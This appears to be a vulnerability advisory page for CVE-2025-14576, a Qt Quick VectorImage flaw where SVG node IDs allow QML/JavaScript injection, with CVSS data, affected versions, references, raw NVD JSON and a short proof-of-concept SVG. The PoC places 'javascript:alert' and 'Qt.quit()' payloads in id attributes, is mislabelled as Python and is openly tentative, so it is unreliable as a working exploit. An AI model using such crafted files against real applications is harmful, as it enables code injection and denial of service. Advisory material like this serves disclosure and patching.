CVE-2025-14576

Description

Insufficient validation of node IDs in Qt SVG module allows arbitrary QML/JavaScript code injection when loading malicious SVG files through the VectorImage component in Qt Quick. While QML execution is typically more restricted than native code execution, this could still lead to denial of service, information disclosure, or other impacts depending on the application's privilege level and data access.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qt:qtdeclarative:*:*:*:*:*:*:*:* - VULNERABLE

Qt (Specific versions not listed in provided text, refer to codereview.qt-project.org/c/qt/qtdeclarative/+/697273)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2025-14576: Qt SVG Node ID Injection -->
<!-- Create a malicious SVG file containing QML/JS injection in the ID attribute -->

<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  
  <!-- Example 1: Attempting to inject JavaScript execution -->
  <!-- Depending on the vulnerability context, the parser might execute the script in the ID -->
  <rect id="javascript:alert('CVE-2025-14576_PoC')" x="0" y="0" width="50" height="50" fill="red"/>

  <!-- Example 2: Attempting to inject QML property binding or method -->
  <circle id="Qt.quit()" cx="75" cy="75" r="25" fill="blue"/>

</svg>

<!-- Usage: Load this file using a vulnerable Qt Quick VectorImage component -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14576
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14576
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14576/
[4] VulDB https://vuldb.com/cve/CVE-2025-14576
[5] https://codereview.qt-project.org/c/qt/qtdeclarative/+/697273

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14576", "sourceIdentifier": "a59d8014-47c4-4630-ab43-e1b13cbe58e3", "published": "2026-04-30T13:16:02.850", "lastModified": "2026-05-05T02:57:05.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient validation of node IDs in Qt SVG module allows arbitrary QML/JavaScript code injection when loading malicious SVG files through the VectorImage component in Qt Quick. While QML execution is typically more restricted than native code execution, this could still lead to denial of service, information disclosure, or other impacts depending on the application's privilege level and data access."}], "metrics": {"cvssMetricV40": [{"source": "a59d8014-47c4-4630-ab43-e1b13cbe58e3", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "a59d8014-47c4-4630-ab43-e1b13cbe58e3", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qt:qtdeclarative:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.8.0", "versionEndExcluding": "6.8.6", "matchCriteriaId": "06BB3954-EACC-4FD9-B24D-88CBC2043FC3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:qt:qtdeclarative:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.10.0", "versionEndExcluding": "6.10.1", "matchCriteriaId": "68D670C7-EF6F-468E-AD32-31F9169A8A20"}]}]}], "references": [{"url": "https://codereview.qt-project.org/c/qt/qtdeclarative/+/697273", "source": "a59d8014-47c4-4630-ab43-e1b13cbe58e3", "tags": ["Patch"]}]}}